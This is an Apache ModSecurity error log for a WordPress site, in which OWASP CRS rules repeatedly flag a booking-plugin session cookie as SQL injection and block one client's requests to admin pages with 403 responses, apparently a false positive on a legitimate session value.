[Mon May 11 22:20:57.451146 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI6KaFW67LJTsgN3jQKhgAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:57.451453 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI6KaFW67LJTsgN3jQKhgAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:57.817431 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6KaFW67LJTsgN3jQKhgAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:58.646972 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI6KqFW67LJTsgN3jQKhwAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:58.647348 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI6KqFW67LJTsgN3jQKhwAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:59.275293 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6KqFW67LJTsgN3jQKhwAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:00.443638 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI6LKFW67LJTsgN3jQKigAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:00.443986 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI6LKFW67LJTsgN3jQKigAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:01.138367 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6LKFW67LJTsgN3jQKigAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:02.256139 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI6LqFW67LJTsgN3jQKiwAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:02.256433 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI6LqFW67LJTsgN3jQKiwAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:02.858335 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6LqFW67LJTsgN3jQKiwAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:04.634127 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI6MKFW67LJTsgN3jQKjQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:04.634429 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI6MKFW67LJTsgN3jQKjQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:05.205975 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6MKFW67LJTsgN3jQKjQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:05.846369 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI6MaFW67LJTsgN3jQKjwAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:05.846658 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI6MaFW67LJTsgN3jQKjwAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:06.479962 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6MaFW67LJTsgN3jQKjwAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:06.723045 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI6MqFW67LJTsgN3jQKkAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:06.723367 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI6MqFW67LJTsgN3jQKkAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:07.093702 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6MqFW67LJTsgN3jQKkAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:09.847319 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI6NaFW67LJTsgN3jQKlwAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:09.847618 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI6NaFW67LJTsgN3jQKlwAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:10.470028 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6NaFW67LJTsgN3jQKlwAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:11.521629 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI6N6FW67LJTsgN3jQKmQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:11.521913 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI6N6FW67LJTsgN3jQKmQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:12.155377 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6N6FW67LJTsgN3jQKmQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:13.058693 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI6OaFW67LJTsgN3jQKnQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:13.058962 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI6OaFW67LJTsgN3jQKnQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:13.683956 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6OaFW67LJTsgN3jQKnQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:14.555217 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI6OqFW67LJTsgN3jQKoAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:14.555507 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI6OqFW67LJTsgN3jQKoAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:15.118569 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6OqFW67LJTsgN3jQKoAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:15.752115 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI6O6FW67LJTsgN3jQKoQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:15.752433 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI6O6FW67LJTsgN3jQKoQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:16.333989 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6O6FW67LJTsgN3jQKoQAAAAg"], referer: https://rentparadise.fr/wp-login.php
